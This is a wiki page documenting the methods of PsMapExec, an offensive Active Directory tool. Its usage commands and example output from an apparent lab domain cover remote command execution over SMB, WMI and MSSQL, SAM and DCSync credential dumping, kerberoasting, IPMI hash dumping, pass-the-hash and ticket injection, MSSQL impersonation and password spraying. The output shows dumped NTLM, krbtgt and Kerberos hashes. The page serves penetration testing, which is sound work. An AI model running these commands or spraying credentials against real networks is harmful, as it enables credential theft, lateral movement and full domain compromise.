Skip to content

01 ‐ Methods

Jump to bottom
The-Viper-One edited this page Oct 14, 2025 · 16 revisions

Overview

In the context of PsMapExec, methods refer to the various built-in functions that enable interaction with systems over specific protocols. Each method defines how PsMapExec performs a task — for instance, the SMB and WMI methods facilitate access checks and remote code execution using their respective protocols. The Spray method tells PsMapExec to conduct a credential spraying operation with the supplied arguments, while the LDAP method directs it to connect to a target LDAP server. PsMapExec supports a range of methods, each tailored for different types of operations. Refer to the table of contents below for details on how to use each one effectively.

🔗 Table of Contents

 

 

> Command Execution Methods

The following methods support command execution and running modules on target systems:

  • MSSQL
  • SMB
  • WinRM
  • WMI

Note: The WMI and SMB methods will warn in the console if there are any issues performing remote cleanup and provide a manual remediation command.

Authentication Types

When -Command and -Module are omitted, PsMapExec will simply check the provided or current user credentials against the specified target systems for administrative access over the specified method.

# Current user
PsMapExec [Method] -Targets All

# With Password
PsMapExec [Method] -Targets All -Username [Username] -Password [Password]

# With Hash
PsMapExec [Method] -Targets All -Username [Username] -Hash [NTLM/RC4/AES256]

# With Ticket
PsMapExec [Method] -Targets All -Ticket [doI.. OR Path to ticket file]

# Local Authentication (WMI and MSSQL only) (Password auth only)
PsMapExec WMI -Targets All -Username Administrator -Password Password -LocalAuth

Command Execution

All currently supported command execution methods support the -Command parameter. The command parameter can be appended to the above Authentication Types to execute given commands as a specified or current user.

PsMapExec [Method] -Targets [Targets] -Command "whoami"
PS > PsMapExec wmi -Targets all -Domain "sevenkingdoms.local, essos.local" -Command whoami

WMI   192.168.56.12   MEEREEN        ESSOS.LOCAL           Windows Server 2016 Standard Evaluation     [-] ACCESS DENIED
WMI   10.0.2.15       REDKEEP        SEVENKINGDOMS.LOCAL   Windows Server 2019 Standard                [+] SUCCESS
sevenkingdoms\moe

WMI   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] SUCCESS
sevenkingdoms\moe

Module Execution

All currently supported command execution methods support the -Module parameter. The module parameter can be appended to the Authentication Types to execute given modules as a specified or current user.

# Syntax example
PsMapExec [Method] -Targets [Targets] -Module [Module]
PS > PsMapExec smb -Targets all -Module sam -ShowOutput -Domain "sevenkingdoms.local, essos.local"

SMB   192.168.56.23   BRAAVOS        ESSOS.LOCAL           Windows Server 2016 Standard Evaluation     [-] ACCESS DENIED
SMB   192.168.56.12   MEEREEN        ESSOS.LOCAL           Windows Server 2016 Standard Evaluation     [-] ACCESS DENIED
SMB   10.0.2.15       REDKEEP        SEVENKINGDOMS.LOCAL   Windows Server 2019 Standard                [+] SUCCESS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::

SMB   192.168.56.21   THE-EYRIE      SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] SUCCESS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f94d37691e2275ee2541960677262f15:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::

SMB   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] SUCCESS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e:::

 

 

> DCSync

Performs DCSync against specified Domain Controller(s). Output is stored in $pwd\PME\DCSync\DCSync_Full_Dump unless a specific user is targeted in which case data is stored in $pwd\PME\DCSync\DCSync_User_Dump

Primary Purpose: Remote DCSyncing and domain password analysis.

Usage

# Target a specific DC
PsMapExec dcsync -Targets redkeep.sevenkingdoms.local -ShowOutput

# Target all DCs (Syncs all accounts, on all DCs, on all domains)(noisy as fuck)
PsMapExec dcsync -Targets DCs -Domain "sevenkingdoms.local, essos.local" -ShowOutput

 

Example Output

PS > PsMapExec dcsync -Targets redkeep.sevenkingdoms.local -ShowOutput

DCSYNC   10.0.2.15   REDKEEP   SEVENKINGDOMS.LOCAL   Windows Server 2019 Standard   [+] SUCCESS

NORTH$::aad3b435b51404eeaad3b435b51404ee:72a0db22de74fd97ac020696517ba98c:::
ESSOS$::aad3b435b51404eeaad3b435b51404ee:e71e8cb00ca7a2254f8fe204c710b8c0:::
krbtgt::aad3b435b51404eeaad3b435b51404ee:47ccccaecaa6f9ecdc7ce48b9c0342cf:::
Administrator::aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e:::
DRAGONSTONE$::aad3b435b51404eeaad3b435b51404ee:0024da62a19d7635b03a65137de1bca2:::
CASTERLYROCK$::aad3b435b51404eeaad3b435b51404ee:5a20e2cf4caa7e42df6b532fff52e8c7:::
Evil_ICao$::aad3b435b51404eeaad3b435b51404ee:b1effe2f03bbd311da2ddb229e4359f6:::

Parsing Results

[*] Parsed NTDS files stored in C:\Users\moe\PME\DCSync\DCSync_Full_Dump

It is also possible to only sync a single user. It is highly recommended to ensure when doing so, to append the domain netbios name to the username.

PsMapExec dcsync -Targets redkeep.sevenkingdoms.local -option "dcsync:security\krbtgt" -ShowOutput

 

Example Output (Single User)

PS > PsMapExec dcsync -Targets redkeep.sevenkingdoms.local -option "dcsync:security\krbtgt" -ShowOutput

DCSYNC   10.0.2.15   REDKEEP   SEVENKINGDOMS.LOCAL   Windows Server 2019 Standard   [+] SUCCESS

< -- Snip -->

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 9/9/2025 9:05:30 PM
Object Security ID   : S-1-5-21-4056014253-3096967110-678733760-502
Object Relative ID   : 502

Credentials:
  Hash NtLm: 47ccccaecaa6f9ecdc7ce48b9c0342cf
    ntlm- 0: 47ccccaecaa6f9ecdc7ce48b9c0342cf
    lm  - 0: 0129ef7692056e177f0e668e266d16f2

< -- Snip -->

 

 

> GenRelayList / SMB Signing

PsMapExec supports SMB signing checks to determine which specified targets have signing enabled.

Output for systems which do not require SMB signing will be stored in $pwd\PME\SMB\SigningNotRequired.txt

Primary Purpose: Identification of systems for SMB signing status.

Usage

PsMapExec GenRelayList -Targets [Targets]

By default, the results are parsed and a list of hostnames are written to disk in the PME folder for all hosts which do not require signing.

Example Output

PS > PsMapExec GenRelayList -Targets All -Domain "Security.local, essos.local"

SMB   10.0.2.15       REDKEEP        SEVENKINGDOMS.LOCAL   Windows Server 2019 Standard                [+] REQUIRED
SMB   192.168.56.12   MEEREEN        ESSOS.LOCAL           Windows Server 2016 Standard Evaluation     [+] REQUIRED
SMB   192.168.56.23   BRAAVOS        ESSOS.LOCAL           Windows Server 2016 Standard Evaluation     [-] NOT REQUIRED
SMB   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] REQUIRED
SMB   192.168.56.21   THE-EYRIE      SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [-] NOT REQUIRED

Success Count    : 3
Script Completed : 08:18:34
Elapsed Time     : 00:00:01.2651776

 

 

> Inject

A simple method, Inject is used to inject a kerberos ticket in memory. There are two primary reasons for performing this method:

  • You do not have any kerberos tickets already in memory, for example when working from a non-domain joined system
  • You wish to revert to different "credentials" after performing impersonation in PsMapExec

Primary Purpose: Changing current user context with various credential material (Rubeus ptt)

Usage

Ticket

A base64 encoded Kerberos ticket can be supplied to the -Ticket parameter either directly into the console or can be loaded from file.

PsMapExec Inject -Ticket "doIhsj..."
PsMapExec Inject -Ticket "C:\ticket.txt"

Username and Hash

A username and hash combination can also be provided for authentication. The following hashes are currently accepted:

  • RC4 / NT
  • NTLM
  • AES256 HMAC 
PsMapExec Inject -Username [User] -Hash [Hash] -Domain [Domain]

 

Username and Password

Traditional username and password combination is also supported.

PsMapExec Inject -Username [User] -Password [Password] -Domain [Domain]

Example Output

PS > klist

Current LogonId is 0:0xb7ed6

#0>	Client: Moe @ SECURITY.LOCAL
	Server: krbtgt/SECURITY.LOCAL @ SECURITY.LOCAL
	KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
	Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize 
	Start Time: 5/23/2025 8:20:30 (local)
	End Time:   5/23/2025 18:20:30 (local)
	Renew Time: 5/30/2025 8:20:30 (local)
	Session Key Type: AES-256-CTS-HMAC-SHA1-96
	Cache Flags: 0x1 -> PRIMARY 
	Kdc Called: 


PS C:\Users\moe> PsMapExec inject -Username administrator -Password Password123!!

[+] Ticket Successfuly Injected

PS > klist

Current LogonId is 0:0xb7ed6

#0>	Client: Administrator @ SECURITY.LOCAL
	Server: krbtgt/SECURITY.LOCAL @ SECURITY.LOCAL
	KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
	Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize 
	Start Time: 5/23/2025 8:21:08 (local)
	End Time:   5/23/2025 18:21:08 (local)
	Renew Time: 5/30/2025 8:21:08 (local)
	Session Key Type: AES-256-CTS-HMAC-SHA1-96
	Cache Flags: 0x1 -> PRIMARY 
	Kdc Called:

 

 

> IPMI

This method will attempt to dump hashes for vulnerable IPMI servers. By default, a built in user list is used unless otherwise specified in which case a user list can be queried from the domain or a single username can be tried against the IPMI server.

Successful hash output is written to $PWD\PME\IPMI

Primary Purpose: IPMI hash dumping.

Usage

Standard targeting using the built in user list

PsMapExec IPMI -Targets [Targets]

Using a list of domain users as a user list, targeting all domain joined systems

PsMapExec IPMI -Targets All -Option IPMI:DomainUsers

Using a single username for authentication

PsMapExec IPMI -Targets All -Option IPMI:admin

 

 

> Kerberoast

This method will connect to the targeted domain and perform kerberoasting on eligible accounts. This method also supprots targeted, single user roasting where required. Depending on the encryption type retrieved, PsMapExec will store collected hashes in two seperate files in a hashcat format ready for password cracking.

Primary Purpose: Kerberoasting

Output is stored in: $PWD\PME\Kerberoast

Optional Parameters

Parameter Value Description
-Domain Domain Set the Domain for which to run against
-Option Kerberoast:USER Specify a single user to roast rather than all candidate users
-ShowOutput N/A Displays hash output to the console

 

Obtain all Kerberoastable users from target domain

PsMapExec kerberoast -Domain [Domain] -ShowOutput

Example Output

PS > PsMapExec kerberoast -Domain dev.security.local -ShowOutput

[*] Found 2 roastable Users

User          : dev_user_1
SPN           : cifs/aLDM2NE6T7j58xUl.domain.com

$krb5tgs$23$*dev_user_1$dev.security.local$cifs/aLDM2NE6T7j58xUl.domain.com*$8CDDB07653F3D27A24395D00220D0798$5AE09881A4
DFE935E11F3A26D5C8A49766D135965B40DEE6525D8E6186058B70505096A94C05581218B739ACF05DD89A27DF7C9885E7255863CE6C4349D2FDD3FF
EE167259FF905A8292B30C12904BE9DB07E3E43192662A141010E02CD4A5468C957E7C60617D8CD7B33059718E7204F2186504EB3D604AF95A613E80

< -- Snip -->

User          : dev_user_2
SPN           : cifs/9Dl1TKMroOy2EtLN.domain.com

$krb5tgs$23$*dev_user_2$dev.security.local$cifs/9Dl1TKMroOy2EtLN.domain.com*$265787A4D7A2BBCF9D56D378501C5458$515A080C96
3FCCCBE5DC5F5DAEB9A92BE35E55BFF9DFE9F594C5DF2053350A393E7D2FCA3A3F1AADBBCB0A9A0B10C2C15ABAD9A3BE55FD7E128C2E6B5E883ED9C9
5CF0D68B4E2C24D84DCF61117E80611E3D85FBD63B95E013EEF03F8D4220E28A3497613AE4ABFC81AB5BEF6BD42E18DC4295BA37B231DCAC2989BD6F

< -- Snip -->

 

Single user specification

PsMapExec Kerberoast -Option "Kerberoast:USER" -ShowOutput

Example Output

PS > PsMapExec kerberoast -Domain dev.security.local -Option "Kerberoast:dev_user_1" -ShowOutput

[*] Found 1 roastable Users

User          : dev_user_1
SPN           : cifs/aLDM2NE6T7j58xUl.domain.com

$krb5tgs$23$*dev_user_1$dev.security.local$cifs/aLDM2NE6T7j58xUl.domain.com*$8CDDB07653F3D27A24395D00220D0798$5AE09881A4
DFE935E11F3A26D5C8A49766D135965B40DEE6525D8E6186058B70505096A94C05581218B739ACF05DD89A27DF7C9885E7255863CE6C4349D2FDD3FF
8E405CEFCB72F37A4B3BCF5070F651A9E0F036EFC90C710082F655B826C69DAD6B6CD03E9CE580799162A13DE60346A3158241225705F9C34B7158F4

< -- Snip -->

 

 

> LDAP / LDAPS

This method is used for performing authentication to LDAP servers. Refer to the Modules page for in depth usage on what can be executed on LDAP servers.

Primary Purpose: Authentication and LDAP based abuse vectors.

Usage

Note: Use "LDAP" for the method name when uncencrypted LDAP connections to port 389 are required. Otherwise it is recommended to use "LDAPS" to connect to port 636 for encrypted communications.

Simply check current user authentication to LDAP

# Check authentication with current user credentials
PsMapExec LDAP -Targets [Targets]

# Execute modules as current user
PsMapExec LDAP -Targets [Targets] -Module [Module]

# Check authentication with alternate credentials
PsMapExec LDAP -Targets [Targets] -Username [User] -Password [Password]

# Check authentication with alternate hash
PsMapExec LDAP -Targets [Targets] -Username [User] -Hash [Hash]

# Check authentication with alternate credentials (ticket) against all Domain Controllers over LDAPS
PsMapExec LDAPS -Targets DCs -Ticket "doIF+DCCBfSgAwIBBaEDA..."

 

 

> MSSQL

The MSSQL method will identify MSSQL servers within the targeted domain and attempt to authenticate to each one, either as the current user context or with provided local authentication credentials. Command execution is supported.

Primary Purpose: Command execution and access checking on MSSQL servers.

Usage

Authentication Types

The MSSQL method supports the following authentication types

# Current user
PsMapExec MSSQL -Targets [Targets]

# Local Authentication (Authenticates through SQL Server login)
PsMapExec MSSQL -Targets [All] -Username [User] -Password [Password] -LocalAuth

Where possible successful authentication to a MSSQL instance will advise which user you are authenticated as:

PS > PsMapExec MSSQL -Targets all -Domain "north.sevenkingdoms.local" -Username [email protected] -Password Password123

MSSQL   192.168.56.22   CASTELBLACK    NORTH.SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] AUTHENTICATED AS SEVENKINGDOMS\Moe

PsMapExec will also advise when you are operating in the context of a SYSADMIN.

PS > PsMapExec MSSQL -Targets all -Domain "north.sevenkingdoms.local" -Username sa -Password Password123 -LocalAuth

MSSQL   192.168.56.22   CASTELBLACK    NORTH.SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] AUTHENTICATED AS sa (SYSADMIN)

Command Execution

If you have sysadmin rights you can supply the -Command or -Module parameter to PsMapExec. xp_cmdshell needs to be enabled to perform command execution, if it is not, PsMapExec will attempt to enable it and, after doing so will revert xp_cmdshell to its original state.

PS > PsMapExec MSSQL -Targets all -Domain "north.sevenkingdoms.local" -Username sa -Password Password123 -LocalAuth -command whoami

MSSQL   192.168.56.22   CASTELBLACK    NORTH.SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] AUTHENTICATED AS sa (SYSADMIN)

north\sql_svc

Impersonation

PsMapExec supports impersonation through MSSQL. This is handled via the -Impersonate parameter.

  • -Impersonate enumerate -> Enumerate authenticating user impersonation rights
PS > PsMapExec MSSQL -Targets all -Domain "north.sevenkingdoms.local" -Username [email protected] -Password Password123 -Impersonate enumerate

MSSQL   192.168.56.22   CASTELBLACK    NORTH.SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] AUTHENTICATED AS SEVENKINGDOMS\Moe

IMPERSONATION RIGHTS

Login             CanImpersonate      State  ID
-----             --------------      -----  --
SEVENKINGDOMS\Moe sa                  GRANT   1
SEVENKINGDOMS\Moe NORTH\brandon.stark GRANT 269

The name of a user to imersponate can also be provided. If the impersonated account has SYSADMIN privileges, then command execution is also supported.

  • -Impersonate sa -> Impersonate the given user account
PS > PsMapExec MSSQL -Targets all -Domain "north.sevenkingdoms.local" -Username [email protected] -Password Password123 -Impersonate sa -Command whoami

MSSQL   192.168.56.22   CASTELBLACK    NORTH.SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] AUTHENTICATED AS sa (SYSADMIN)

north\sql_svc

 

 

> RDP

Performs authentication against RDP services against selected targets.

Primary Purpose: Authentication verification of targets

Note: Hash and Ticket authentication is not supported for this method.

Usage

# Domain Authentication
PsMapExec RDP -Targets [Targets] -Domain [Domain] -Username [User] -Password [Password]

# Local Authentication
PsMapExec RDP -Targets [Targets] -Domain [Domain] -Username [User] -Password [Password] -LocalAuth

Example Output

PS > psmapexec RDP -Targets all -Domain "sevenkingdoms.local, north.sevenkingdoms.local" -Username [email protected] -Password Password123

RDP   192.168.56.22   CASTELBLACK    north.sevenkingdoms.local   Windows Server 2019 Datacenter Evaluation   [*] CREDSSP ERROR
RDP   192.168.56.11   WINTERFELL     north.sevenkingdoms.local   Windows Server 2019 Datacenter Evaluation   [-] ACCESS DENIED
RDP   192.168.56.21   THE-EYRIE      sevenkingdoms.local         Windows Server 2019 Datacenter Evaluation   [+] SUCCESS
RDP   192.168.56.10   KINGSLANDING   sevenkingdoms.local         Windows Server 2019 Datacenter Evaluation   [+] SUCCESS

 

 

> SMBv1

Performs a simple packet level check against the specified hosts to determine if SMBv1 is enabled.

Output for systems which do not require SMB signing will be stored in $pwd\PME\SMB\SMBv1\SigningNotRequired.txt

Primary Purpose: Identification of systems for SMBv1 status

Usage

PsMapExec SMBv1 -Targets [Targets] -Domain [Domain]

By default, the results are parsed and a list of FQDNs are written to disk in the PME folder for all hosts which have SMBv1 enabled.

Example Output

PS > PsMapExec SMBv1 -Targets all -Domain "sevenkingdoms.local, essos.local, north.sevenkingdoms.local"

SMB   192.168.56.12   MEEREEN        ESSOS.LOCAL                 Windows Server 2016 Standard Evaluation     [-] SMBv1 ENABLED
SMB   192.168.56.11   WINTERFELL     NORTH.SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [+] SMBv1 DISABLED
SMB   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL         Windows Server 2019 Datacenter Evaluation   [+] SMBv1 DISABLED
SMB   10.0.2.15       REDKEEP        SEVENKINGDOMS.LOCAL         Windows Server 2019 Standard                [+] SMBv1 DISABLED

 

 

> Spray

The spray method offers various credential spraying techniques. PsMapExec is designed to respect the domain's default account lockout threshold, helping to prevent user lockouts. However, it does not account for fine-grained password policies (FGPPs). It’s recommended to verify whether FGPPs are in use within the environment, as they could lead to unintended account lockouts during spraying.

Note: Successfully sprayed users are redacted from future spraying attempts in order to reduce unnecessary risk of lock out and requests to the Domain Controller.

Primary Purpose: Account validation through credential spraying

Usage

Targets

When using the Spray method, the -Targets parameter is used to specify which accounts to perform password spraying on. if -Targets is not specified all enabled user accounts for the targeted or current domain will be sprayed against.

Other values for -Targets are supported; as shown below:

PsMapExec Spray -Domain Security.local                           # Sprays all users
PsMapExec Spray -Domain Security.local -Targets "All"            # Sprays all users
PsMapExec Spray -Domain Security.local -Targets "C:\Users.txt"   # Sprays users from list (SamAccountNames)
PsMapExec Spray -Domain Security.local -Targets "AdminCount=1"   # Sprays targets which have the attribute AdminCount=1
PsMapExec Spray -Domain Security.local -Targets "Group Name"     # Sprays members of group

Hash

Hash authentication supports NT, LM:NT and AES256 hashes

PsMapExec Spray -SprayHash [RC4]
PsMapExec Spray -SprayHash [AES256]
PsMapExec Spray -SprayHash [LM:NT]

Password

PsMapExec Spray -SprayPassword [Password]

AccountAsPassword

Sets the password to the username value.

PsMapExec Spray -AccountAsPassword

EmptyPassword

Authentication attempts are performed with empty password values.

PsMapExec Spray -EmptyPassword

Pre2k

Sprays for Pre2k computer accounts.

PsMapExec Spray -Pre2k

SuccessOnly

Displays only successful authentication attempts. This is recommended in large domains as a large number of console writes hinders the speed PowerShell significantly.

PsMapExec Spray -SprayPassword [Password] -SuccessOnly

Example Output

PS > PsMapExec spray -domain sevenkingdoms.local -SprayPassword Password123

 - Targeted Domain    : sevenkingdoms.local
 - Lockout Threshold  : 5
 - Safety Limit value : 4

[*] Spraying with password value: Password123

[*] cersei.lannister          -> Limit
[*] lord.varys                -> Limit
[*] tyron.lannister           -> Limit
[*] robert.baratheon          -> Limit
[*] renly.baratheon           -> Limit
[*] jaime.lannister           -> Limit
[*] tywin.lannister           -> Limit
[*] stannis.baratheon         -> Limit
[*] maester.pycelle           -> Limit
[*] joffrey.baratheon         -> Limit
[+] low_priv_2                -> Success
[+] admin_2                   -> Success
[+] Moe                       -> Success
[*] robin.arryn               -> Limit
[+] low_priv                  -> Success
[-] lysa.arryn                -> Failure
[*] Administrator             -> Limit
[*] vagrant                   -> Limit
[*] petyer.baelish            -> Limit


[*] Successful accounts in target domain sevenkingdoms.local

[+] sevenkingdoms.local\low_priv_2
[+] sevenkingdoms.local\admin_2
[+] sevenkingdoms.local\Moe
[+] sevenkingdoms.local\low_priv

[*] Output written to C:\Users\moe\Desktop\PME\Spraying

> VNC

This method simply performs a "no auth" check on any identified VNC servers.

Primary Purpose: Checks for "no auth" on VNC servers

Usage

# Check for VNC no auth on all systems in the domain
PsMapExec VNC -Target [Targets] -Domain [Domain]

Example Output

PS > PsMapExec vnc -Targets ALL -Domain sevenkingdoms.local

VNC   10.0.2.15       REDKEEP        SEVENKINGDOMS.LOCAL   Windows Server 2019 Standard                [+] AUTH NOT REQUIRED
VNC   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [-] AUTH REQUIRED
VNC   192.168.56.21   THE-EYRIE      SEVENKINGDOMS.LOCAL   Windows Server 2019 Datacenter Evaluation   [-] AUTH REQUIRED

 

 

Clone this wiki locally